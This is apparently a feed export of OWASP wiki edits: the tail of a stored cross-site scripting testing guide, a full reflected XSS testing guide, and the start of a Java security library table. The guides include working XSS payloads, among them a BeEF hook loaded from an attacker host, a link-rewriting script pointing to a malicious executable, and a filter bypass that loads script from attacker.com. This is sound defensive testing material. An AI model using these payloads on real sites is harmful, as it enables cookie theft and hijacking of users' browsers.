&amp;lt;pre&amp;gt;aaa@aa.com&amp;amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;aaa@aa.com%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensure the input is submitted through the application. This normally involves disabling JavaScript if client-side security controls are implemented or modifying the HTTP request with a web proxy such as [[OWASP WebScarab Project|WebScarab]]. It is also important to test the same injection with both HTTP GET and POST requests. The above injection results in a popup window containing the cookie values.&lt;br /&gt;
&lt;br /&gt;
'''Result Expected''':&lt;br /&gt;
&lt;br /&gt;
[[Image:Stored_xss_example.jpg]]&lt;br /&gt;
&lt;br /&gt;
The HTML code following the injection:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;input class=&amp;quot;inputbox&amp;quot; type=&amp;quot;text&amp;quot; name=&amp;quot;email&amp;quot; size=&amp;quot;40&amp;quot; value=&amp;quot;aaa@aa.com&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The input is stored and the XSS payload is executed by the browser when reloading the page.&amp;lt;br&amp;gt;&lt;br /&gt;
If the input is escaped by the application, testers should test the application for XSS filters. For instance, if the string &amp;quot;SCRIPT&amp;quot; is replaced by a space or by a NULL character then this could be a potential sign of XSS filtering in action. Many techniques exist in order to evade input filters. It is strongly recommended that testers refer to [http://ha.ckers.org/xss.html RSnake] and [https://h4k.in/encoding/ Mario] XSS Cheat pages which provide an extensive list of XSS attacks and filtering bypasses. Refer to the whitepapers/tools section for more detailed information.&lt;br /&gt;
&lt;br /&gt;
'''Leverage Stored XSS with BeEF'''&lt;br /&gt;
&lt;br /&gt;
Stored XSS can be exploited by advanced JavaScript exploitation frameworks such as [http://www.bindshell.net/tools/beef BeEF], [http://xss-proxy.sourceforge.net/ XSS Proxy] and [http://www.gnucitizen.org/projects/backframe/ Backframe]. Let’s see what a typical BeEF exploitation scenario involves:&lt;br /&gt;
&lt;br /&gt;
* Injecting a JavaScript hook which communicates to the attacker's browser exploitation framework (BeEF)&lt;br /&gt;
* Waiting for the application user to view the vulnerable page where the stored input is displayed&lt;br /&gt;
* Control the application user’s browser via the BeEF console&lt;br /&gt;
&lt;br /&gt;
The JavaScript hook can be injected by exploiting the XSS vulnerability in the web application.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Example&amp;lt;/b&amp;gt;: BeEF Injection in index2.php:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;aaa@aa.com”&amp;gt;&amp;lt;script src=http://attackersite/beef/hook/beefmagic.js.php&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When the user loads the page index2.php, the script beefmagic.js.php is executed by the browser. It is then possible to access cookies, user screenshot, user clipboard, and launch complex XSS attacks.&lt;br /&gt;
&lt;br /&gt;
'''Result Expected'''&lt;br /&gt;
&lt;br /&gt;
[[Image:BeEF_in_action.jpg]]&lt;br /&gt;
&lt;br /&gt;
This attack is particularly effective in vulnerable pages that are viewed by many users with different privileges.&lt;br /&gt;
&lt;br /&gt;
'''File Upload'''&lt;br /&gt;
&lt;br /&gt;
If the web application allows file upload, it is important to check if it is possible to upload HTML content. For instance, if HTML or TXT files are allowed, XSS payload can be injected in the file uploaded. The pen-tester should also verify if the file upload allows setting arbitrary MIME types.&lt;br /&gt;
&lt;br /&gt;
Consider the following HTTP POST request for file upload:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
POST /fileupload.aspx HTTP/1.1&lt;br /&gt;
[…]&lt;br /&gt;
&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;uploadfile1&amp;quot;; filename=&amp;quot;C:\Documents and Settings\test\Desktop\test.txt&amp;quot;&lt;br /&gt;
Content-Type: text/plain&lt;br /&gt;
&lt;br /&gt;
test&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This design flaw can be exploited in browser MIME mishandling attacks. For instance, innocuous-looking files like JPG and GIF can contain an XSS payload that is executed when they are loaded by the browser. This is possible when the MIME type for an image such as image/gif can instead be set to text/html. In this case the file will be treated by the client browser as HTML.&lt;br /&gt;
&lt;br /&gt;
HTTP POST Request forged:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;uploadfile1&amp;quot;; filename=&amp;quot;C:\Documents and Settings\test\Desktop\test.gif&amp;quot;&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Also consider that Internet Explorer does not handle MIME types in the same way as Mozilla Firefox or other browsers do. For instance, Internet Explorer handles TXT files with HTML content as HTML content. For further information about MIME handling, refer to the whitepapers section at the bottom of this chapter.&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example ==&lt;br /&gt;
Gray Box testing is similar to Black box testing. In gray box testing, the pen-tester has partial knowledge of the application. In this case, information regarding user input, input validation controls, and data storage might be known by the pen-tester.&lt;br /&gt;
 &lt;br /&gt;
Depending on the information available, it is normally recommended that testers check how user input is processed by the application and then stored into the back-end system. The following steps are recommended:&lt;br /&gt;
&lt;br /&gt;
* Use front-end application and enter input with special/invalid characters&lt;br /&gt;
* Analyze application response(s)&lt;br /&gt;
* Identify presence of input validation controls&lt;br /&gt;
* Access back-end system and check if input is stored and how it is stored&lt;br /&gt;
* Analyze source code and understand how stored input is rendered by the application&lt;br /&gt;
&lt;br /&gt;
If source code is available (White Box), all variables used in input forms should be analyzed.&lt;br /&gt;
&lt;br /&gt;
In particular, programming languages such as PHP, ASP, and JSP make use of predefined variables/functions to store input from HTTP GET and POST requests.&lt;br /&gt;
&lt;br /&gt;
The following table summarizes some special variables and functions to look at when analyzing source code:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote style=&amp;quot;background: white; border: 1px solid rgb(153, 153, 153); padding: 1em;&amp;quot;&amp;gt;&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;margin: 1em auto 1em auto&amp;quot;&lt;br /&gt;
| '''PHP''' || '''ASP''' || '''JSP'''&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
* $_GET - HTTP GET variables&lt;br /&gt;
* $_POST - HTTP POST variables&lt;br /&gt;
* $_FILES - HTTP File Upload variables&lt;br /&gt;
|| &lt;br /&gt;
* Request.QueryString - HTTP GET&lt;br /&gt;
* Request.Form - HTTP POST&lt;br /&gt;
* Server.CreateObject - used to upload files&lt;br /&gt;
|| &lt;br /&gt;
* doGet, doPost servlets - HTTP GET and POST&lt;br /&gt;
* request.getParameter - HTTP GET/POST variables&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;/blockquote&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Books'''&amp;lt;br&amp;gt;&lt;br /&gt;
* Joel Scambray, Mike Shema, Caleb Sima - &amp;quot;Hacking Exposed Web Applications&amp;quot;, Second Edition, McGraw-Hill, 2006 - ISBN 0-07-226229-0&lt;br /&gt;
* Dafydd Stuttard, Marcus Pinto - &amp;quot;The Web Application's Handbook - Discovering and Exploiting Security Flaws&amp;quot;, 2008, Wiley, ISBN 978-0-470-17077-9&lt;br /&gt;
* Jeremiah Grossman, Robert &amp;quot;RSnake&amp;quot; Hansen, Petko &amp;quot;pdp&amp;quot; D. Petkov, Anton Rager, Seth Fogie - &amp;quot;Cross Site Scripting Attacks: XSS Exploits and Defense&amp;quot;, 2007, Syngress, ISBN-10: 1-59749-154-3&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* RSnake: &amp;quot;XSS (Cross Site Scripting) Cheat Sheet&amp;quot; - http://ha.ckers.org/xss.html&lt;br /&gt;
&lt;br /&gt;
* CERT: &amp;quot;CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests&amp;quot; - http://www.cert.org/advisories/CA-2000-02.html&lt;br /&gt;
&lt;br /&gt;
* Aung Khant: &amp;quot;What XSS Can do - Benefits of XSS From Attacker's view&amp;quot; - http://yehg.org/lab/pr0js/papers/What%20XSS%20Can%20Do.pdf&lt;br /&gt;
&lt;br /&gt;
* Amit Klein: &amp;quot;Cross-site Scripting Explained&amp;quot; - http://courses.csail.mit.edu/6.857/2009/handouts/css-explained.pdf&lt;br /&gt;
&lt;br /&gt;
* Gunter Ollmann: &amp;quot;HTML Code Injection and Cross-site Scripting&amp;quot; - http://www.technicalinfo.net/papers/CSS.html&lt;br /&gt;
&lt;br /&gt;
* CGISecurity.com: &amp;quot;The Cross Site Scripting FAQ&amp;quot; - http://www.cgisecurity.com/xss-faq.html&lt;br /&gt;
&lt;br /&gt;
* Blake Frantz: &amp;quot;Flirting with MIME Types: A Browser's Perspective&amp;quot; - http://www.leviathansecurity.com/pdf/Flirting%20with%20MIME%20Types.pdf&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
* '''[[OWASP CAL9000 Project|OWASP CAL9000]]''' &lt;br /&gt;
CAL9000 includes a sortable implementation of RSnake's XSS Attacks, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more. &lt;br /&gt;
&lt;br /&gt;
* '''PHP Charset Encoder(PCE)''' - http://h4k.in/encoding&lt;br /&gt;
PCE helps you encode arbitrary texts to and from 65 kinds of character sets that you can use in your customized payloads.&lt;br /&gt;
&lt;br /&gt;
* '''Hackvertor''' - http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php&lt;br /&gt;
Hackvertor is an online tool which allows many types of encoding and obfuscation of JavaScript (or any string input).&lt;br /&gt;
&lt;br /&gt;
* '''BeEF''' - http://www.bindshell.net/tools/beef/&lt;br /&gt;
BeEF is the browser exploitation framework. A professional tool to demonstrate the real-time impact of browser vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
* '''XSS-Proxy''' - http://xss-proxy.sourceforge.net/&lt;br /&gt;
XSS-Proxy is an advanced Cross-Site-Scripting (XSS) attack tool.&lt;br /&gt;
&lt;br /&gt;
* '''Backframe''' - http://www.gnucitizen.org/projects/backframe/&lt;br /&gt;
Backframe is a full-featured attack console for exploiting WEB browsers, WEB users, and WEB applications.&lt;br /&gt;
&lt;br /&gt;
* '''[[OWASP WebScarab Project|WebScarab]]'''&lt;br /&gt;
WebScarab is a framework for analyzing applications that communicate using the HTTP and HTTPS protocols.&lt;br /&gt;
&lt;br /&gt;
* '''Burp''' - http://portswigger.net/proxy/&lt;br /&gt;
Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web applications. &lt;br /&gt;
&lt;br /&gt;
* '''XSS Assistant''' - http://www.whiteacid.org/xss_assistant.user.js&lt;br /&gt;
Greasemonkey script that allow users to easily test any web application for cross-site-scripting flaws.&lt;br /&gt;
&lt;br /&gt;
* '''OWASP Zed Attack Proxy (ZAP)''' - [[OWASP_Zed_Attack_Proxy_Project]]&lt;br /&gt;
ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)&amp;diff=132440</id>
		<title>Testing for Reflected Cross site scripting (OTG-INPVAL-001)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)&amp;diff=132440"/>
				<updated>2012-07-01T10:39:19Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: I included the OWASP ZAProxy tool in the Tools section.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&lt;br /&gt;
Reflected [[Cross-site Scripting (XSS)]] is another name for non-persistent &lt;br /&gt;
XSS, where the attack doesn't load with the vulnerable web application &lt;br /&gt;
but is originated by the victim loading the offending URI. In this &lt;br /&gt;
article we will see some ways to test a web application for this kind of &lt;br /&gt;
vulnerability.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&lt;br /&gt;
Reflected XSS attacks are also known as type 1 or non-persistent XSS attacks, and &lt;br /&gt;
are the most frequent type of XSS attacks found nowadays. &lt;br /&gt;
&lt;br /&gt;
When a web application is vulnerable to this type of attack, it will &lt;br /&gt;
pass unvalidated input sent through requests to the client. The common modus &lt;br /&gt;
operandi of the attack includes a design step, in which the attacker &lt;br /&gt;
creates and tests an offending URI, a social engineering step, in which &lt;br /&gt;
she convinces her victims to load this URI on their browsers, and the eventual &lt;br /&gt;
execution of the offending code &amp;amp;mdash; using the victim's credentials. &lt;br /&gt;
&lt;br /&gt;
Commonly the attacker's code is written in the Javascript language, but  &lt;br /&gt;
other scripting languages are also used, e.g., ActionScript and VBScript. &lt;br /&gt;
&lt;br /&gt;
Attackers typically leverage these vulnerabilities to &lt;br /&gt;
install key loggers, steal victim cookies, perform clipboard theft, and &lt;br /&gt;
change the content of the page (e.g., download links). &lt;br /&gt;
&lt;br /&gt;
One of the important matters about exploiting XSS vulnerabilities is character encoding. &lt;br /&gt;
In some cases, the web server or the web application could not be filtering some &lt;br /&gt;
encodings of characters, so, for example, the web application might filter out &amp;quot;&amp;lt;script&amp;gt;&amp;quot;, &lt;br /&gt;
but might not filter %3cscript%3e which simply includes another encoding of tags. &lt;br /&gt;
A nice tool for testing character encodings is OWASP's [[OWASP CAL9000 Project|CAL9000]]. &lt;br /&gt;
&lt;br /&gt;
== Black Box testing ==&lt;br /&gt;
A black-box test will include at least three phases:&lt;br /&gt;
&lt;br /&gt;
1. Detect input vectors. The tester must determine the web application's&lt;br /&gt;
variables and how to input them in the web application. See the example below.&lt;br /&gt;
&lt;br /&gt;
2. Analyze each input vector to detect potential vulnerabilities. To detect an XSS vulnerability, the&lt;br /&gt;
tester will typically use specially crafted input data with each input vector. Such input data is&lt;br /&gt;
typically harmless, but trigger responses from the web browser that&lt;br /&gt;
manifests the vulnerability. Testing data can be generated by using a web application fuzzer or manually. &lt;br /&gt;
&lt;br /&gt;
3. For each vulnerability reported in the previous phase, the tester&lt;br /&gt;
will analyze the report and attempt to exploit it with an attack that&lt;br /&gt;
has a realistic impact on the web application's security.&lt;br /&gt;
&lt;br /&gt;
== Example 1 == &lt;br /&gt;
For example, consider a site that has a welcome notice &amp;quot; Welcome %username% &amp;quot; and a download link. &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
[[Image:XSS Example1.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
The tester must suspect that every data entry point can result in an XSS attack. To analyze it, the tester will play with the user variable and try to trigger the vulnerability. &lt;br /&gt;
Let's try to click on the following link and see what happens:&lt;br /&gt;
&amp;lt;pre&amp;gt;http://example.com/index.php?user=&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If no sanitization is applied this will result in the following popup:&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
[[Image:alert.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
This indicates that there is an XSS vulnerability and it appears that the tester can execute code of his choice in anybody's browser if he clicks on the tester's link.&lt;br /&gt;
&lt;br /&gt;
== Example 2 ==&lt;br /&gt;
Let's try other piece of code (link):&lt;br /&gt;
&amp;lt;pre&amp;gt;http://example.com/index.php?user=&amp;lt;script&amp;gt;window.onload = function() {var AllLinks=document.getElementsByTagName(&amp;quot;a&amp;quot;); &lt;br /&gt;
AllLinks[0].href = &amp;quot;http://badexample.com/malicious.exe&amp;quot;; }&amp;lt;/script&amp;gt; &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This produces the following behavior:&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
[[Image:XSS Example2.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
This will cause the user, clicking on the link supplied by the tester, to download the file malicious.exe from a site he controls.&lt;br /&gt;
&lt;br /&gt;
== Countermeasures ==&lt;br /&gt;
Most web applications today use some sort of sanitization. Yet,&lt;br /&gt;
some remain vulnerable. Reflected cross-site scripting attacks are&lt;br /&gt;
prevented either at the side of the server, by sanitization or a web&lt;br /&gt;
application firewall, or at the side of the client by prevention&lt;br /&gt;
mechanisms that are embedded in modern web browsers.&lt;br /&gt;
&lt;br /&gt;
Since most of the clients do not update their browsers, the tester&lt;br /&gt;
cannot count on this and must test for vulnerabilities assuming that web&lt;br /&gt;
browsers will not prevent the attack. ( Frei et al 2008 )&lt;br /&gt;
&lt;br /&gt;
A web application or the web server (e.g., Apache's mod_rewrite module)&lt;br /&gt;
can parse the URL matching a regular expression as a sanitization&lt;br /&gt;
procedure. For example the following regular expression can be used to&lt;br /&gt;
detect (and block) alphanumeric characters between tags or slashes.&lt;br /&gt;
&lt;br /&gt;
 /((\%3C)|&amp;lt;)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|&amp;gt;)/i&lt;br /&gt;
&lt;br /&gt;
Hence, the above attack will not work. However, this regular expression&lt;br /&gt;
does not completely fix the vulnerability. In a grey-box test, the&lt;br /&gt;
tester might access the source code and analyze the sanitization&lt;br /&gt;
procedure to decide if it can be circumvented.&lt;br /&gt;
&lt;br /&gt;
== Example 3 ==&lt;br /&gt;
To black-box test whether there is a vulnerability or not, the tester&lt;br /&gt;
will use many test vectors, each circumventing different&lt;br /&gt;
sanitization procedures, hoping that one will work. For example, let's say&lt;br /&gt;
that the following code is executed:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?&lt;br /&gt;
$re = &amp;quot;/&amp;lt;script[^&amp;gt;]+src/i&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
if (preg_match($re, $_GET['var'])) {&lt;br /&gt;
  echo &amp;quot;Filtered&amp;quot;;&lt;br /&gt;
  return; }&lt;br /&gt;
echo &amp;quot;Welcome &amp;quot;.$_GET['var'].&amp;quot; !&amp;quot;;&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In this scenario there is a regular expression checking if '''&amp;lt;script [anything but the character: '&amp;gt;' ] src''' is inserted. This is useful for&lt;br /&gt;
filtering expressions like '''&amp;lt;script src=&amp;quot;http://attacker.com/xss.js&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;''', which is a common attack. But,&lt;br /&gt;
in this case, it is possible to bypass the sanitization by using the &amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
character in an attribute between script and src, like this:&lt;br /&gt;
&lt;br /&gt;
http://www.example.com/?var=&amp;lt;SCRIPT%20a=&amp;quot;&amp;gt;&amp;quot;%20SRC=&amp;quot;http://www.attacker.com/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will exploit the reflected cross site scripting vulnerability shown before,&lt;br /&gt;
executing the javascript code stored on the attacker's web server as if it was originating from the victim web site, www.example.com.&lt;br /&gt;
&lt;br /&gt;
A complete test will include instantiating a variable with several&lt;br /&gt;
attack vectors (Check [[Fuzz_Vectors Fuzz vectors appendix|Fuzz vectors appendix]] and [[Encoded Injection|Encoded injection appendix]]).&lt;br /&gt;
&lt;br /&gt;
Finally, analyzing answers can get complex. A simple way to do this is&lt;br /&gt;
to use code that pops up a dialog, as in our example. This typically indicates that an&lt;br /&gt;
attacker could execute arbitrary JavaScript of his choice in the&lt;br /&gt;
visitors' browsers.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Books'''&amp;lt;br&amp;gt;&lt;br /&gt;
* Joel Scambray, Mike Shema, Caleb Sima - &amp;quot;Hacking Exposed Web Applications&amp;quot;, Second Edition, McGraw-Hill, 2006 - ISBN 0-07-226229-0&lt;br /&gt;
* Dafydd Stuttard, Marcus Pinto - &amp;quot;The Web Application's Handbook - Discovering and Exploiting Security Flaws&amp;quot;, 2008, Wiley, ISBN 978-0-470-17077-9&lt;br /&gt;
* Jeremiah Grossman, Robert &amp;quot;RSnake&amp;quot; Hansen, Petko &amp;quot;pdp&amp;quot; D. Petkov, Anton Rager, Seth Fogie - &amp;quot;Cross Site Scripting Attacks: XSS Exploits and Defense&amp;quot;, 2007, Syngress, ISBN-10: 1-59749-154-3&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* '''CERT''' - Malicious HTML Tags Embedded in Client Web Requests: [http://www.cert.org/advisories/CA-2000-02.html Read]&lt;br /&gt;
* '''Rsnake''' - XSS Cheat Sheet: [http://ha.ckers.org/xss.html Read]&lt;br /&gt;
* '''cgisecurity.com''' - The Cross Site Scripting FAQ: [http://www.cgisecurity.com/articles/xss-faq.shtml Read]&lt;br /&gt;
* '''G.Ollmann''' - HTML Code Injection and Cross-site scripting: [http://www.technicalinfo.net/papers/CSS.html Read]&lt;br /&gt;
* '''A. Calvo, D.Tiscornia''' - alert('A javascritp agent'): [http://corelabs.coresecurity.com/index.php?module=FrontEndMod&amp;amp;action=view&amp;amp;type=publication&amp;amp;name=alert%28A_javascritp_agent%29 Read] ( To be published )&lt;br /&gt;
* '''S. Frei, T. Dübendorfer, G. Ollmann, M. May''' - Understanding the Web browser threat: [http://www.techzoom.net/publications/insecurity-iceberg/index.en Read]&lt;br /&gt;
'''Tools''' &amp;lt;br&amp;gt;&lt;br /&gt;
* '''[[OWASP CAL9000 Project|OWASP CAL9000]]''' &lt;br /&gt;
CAL9000 is a collection of web application security testing tools that complement the feature set of current web proxies and automated scanners. It's hosted as a reference at http://yehg.net/lab/pr0js/pentest/CAL9000/ .&lt;br /&gt;
* '''PHP Charset Encoder(PCE)''' - http://h4k.in/encoding [mirror: http://yehg.net/e ]&lt;br /&gt;
This tool helps you encode arbitrary texts to and from 65 kinds of charsets. Also some encoding functions featured by JavaScript are provided.&lt;br /&gt;
* '''HackVertor''' -  http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php&lt;br /&gt;
It provides multiple dozens of flexible encoding for advanced string manipulation attacks.&lt;br /&gt;
* '''[[OWASP WebScarab Project|WebScarab]]'''&lt;br /&gt;
WebScarab is a framework for analysing applications that communicate using the HTTP and HTTPS protocols. &lt;br /&gt;
* '''XSS-Proxy''' - http://xss-proxy.sourceforge.net/&lt;br /&gt;
XSS-Proxy is an advanced Cross-Site-Scripting (XSS) attack tool.&lt;br /&gt;
* '''ratproxy''' - http://code.google.com/p/ratproxy/&lt;br /&gt;
A semi-automated, largely passive web application security audit tool, optimized for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments.&lt;br /&gt;
* '''Burp Proxy''' - http://portswigger.net/proxy/&lt;br /&gt;
Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web applications.&lt;br /&gt;
* '''OWASP Zed Attack Proxy (ZAP)''' - [[OWASP_Zed_Attack_Proxy_Project]]&lt;br /&gt;
ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Summary_of_Java_Security_Libraries&amp;diff=130124</id>
		<title>Summary of Java Security Libraries</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Summary_of_Java_Security_Libraries&amp;diff=130124"/>
				<updated>2012-05-19T10:13:48Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== What is this page for?  ==&lt;br /&gt;
&lt;br /&gt;
This page contains a table of Java security libraries and indicates which security features each library supports. &lt;br /&gt;
&lt;br /&gt;
The plan is to use this information to work backwards to create a 'decision tree' which will allow Java developers to decide which security libraries would be the most suitable for their requirements. &lt;br /&gt;
&lt;br /&gt;
It is at a ''very'' early stage, and will almost certainly contain many mistakes and omissions. Please feel free to correct these yourself, or contact [http://www.owasp.org/index.php/User:Psiinon Psiinon] to correct them on your behalf. &lt;br /&gt;
&lt;br /&gt;
== Java Security Libraries  ==&lt;br /&gt;
&lt;br /&gt;
{| border=&amp;quot;1&amp;quot; align=&amp;quot;center&amp;quot; width=&amp;quot;80%&amp;quot; cellspacing=&amp;quot;1&amp;quot; cellpadding=&amp;quot;1&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;col&amp;quot; | Name and link&amp;lt;br&amp;gt; &lt;br /&gt;
! scope=&amp;quot;col&amp;quot; | Updated&amp;lt;br&amp;gt; &lt;br /&gt;
! scope=&amp;quot;col&amp;quot; | AU&amp;lt;br&amp;gt; &lt;br /&gt;
! scope=&amp;quot;col&amp;quot; | AC&amp;lt;br&amp;gt; &lt;br /&gt;
! scope=&amp;quot;col&amp;quot; | CF&amp;lt;br&amp;gt; &lt;br /&gt;
! scope=&amp;quot;col&amp;quot; | CR&amp;lt;br&amp;gt; &lt;br /&gt;
! scope=&amp;quot;col&amp;quot; | IV&amp;lt;br&amp;gt; &lt;br /&gt;
! scope=&amp;quot;col&amp;quot; | OE&amp;lt;br&amp;gt; &lt;br /&gt;
! scope=&amp;quot;col&amp;quot; | SM&amp;lt;br&amp;gt; &lt;br /&gt;
! scope=&amp;quot;col&amp;quot; | XM&amp;lt;br&amp;gt; &lt;br /&gt;
! scope=&amp;quot;col&amp;quot; | XS&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [http://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project AntiSami]&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | 2011&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;amp;nbsp;Y&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | Y&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [http://santuario.apache.org/ Apache Santuarrio]&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | 2011&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;amp;nbsp;Y&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [http://shiro.apache.org/ Apache Shiro]&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | 2011&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | Y&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | Y&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;amp;nbsp;?&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | Y&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;amp;nbsp;?&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | Y&amp;lt;br&amp;gt; &lt;br /&gt;
